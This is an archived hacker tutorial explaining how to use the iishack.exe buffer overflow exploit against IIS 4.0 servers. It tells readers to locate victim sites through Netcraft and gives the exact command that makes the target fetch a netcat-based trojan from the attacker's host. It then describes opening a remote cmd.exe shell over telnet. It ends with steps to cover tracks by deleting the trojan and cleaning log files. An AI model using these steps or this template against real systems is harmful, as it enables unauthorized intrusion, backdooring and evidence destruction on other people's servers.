TUCoPS :: Web :: IIS :: iisa.txt

IIS Remote Buffer Overflow Attack 

The Internet Information Server Attack: 
Remote buffer overflow exploit

By Aicra Byte

Forewords

Since this is a pretty new attack against the Internet Information Server, IIS, I have decided to write a paper on how to do it. A couple of days before I wrote this paper, I heard that two hackers from New Zealand was sent to jail because of this attack they did against a asian television company. They now have to spent three years in jail and pay a fine of $10,000 each. 
Decide for yourself if you wanna try this hack or not! 
This text goes out to all those NT hackers outthere. It is based on the info I have from eEye Digital Security Team and my own experience.



Information

·	Note: All the files used in this document is available at my homepage http://cip.subnet.dk in the Software section.

According to eEye Digital Security Team the systems affected include:

Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4

I used the attack on a Windows NT 4.0 machine with the required programs as follows against IIS4.0 SP4 OP4:

·	iishack.exe
·	ncx.exe

Ncx.exe is a hacked up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its argument, which means that ncx.exe binds cmd.exe to port 80. The eEye people has received some reports from people not being able use the ncx.exe, so they have made another hacked version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason of why ncx.exe doesn't work sometimes is that inetinfo.exe has to be exited, before it can work. Ncx.exe fits under the description trojan horse!

How to do it

First you'll have to find a server using IIS4, NT4 and/or SP3/4/5 + OP4. To do so, go to www.netcraft.com or you favourite “what-this-site-running-search-engine” and find a victim running the affected system.








·	Then launch iishack.exe via the command prompt in WinNT. 

Output:

------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com

[usage: iishack <host> <port> <url> ]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------


·	Then issue the command as you can see above ex.

C:\>iishack www.YourIIS.com 80 YourOwnIpAddress/ncx.exe

Output (if succesful):

Data sent!


·	Note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to  to monitor your outgoing bytes.
·	After that type telnet www.YourIIS.com 80 in cmd.exe or in the start/run menu.


Output:

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>

·	Voila! Access granted!
·	Do you whatever you wanna do, but remember to:
·	- add a scheduled task to restart inetinfo.exe in X minuts.
·	- add a scheduled task to delete ncx.exe X-1 minuts.
·	- clean the logfiles (if there is any).


Be imaginative!
Hackers contribute the security. 

******************************************************
Corrections, suggestion or comments:

Aicra Byte
aicra@yale.cadet.net
Cekurity In Progress
http://cip.subnet.dk
**************************************************************

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH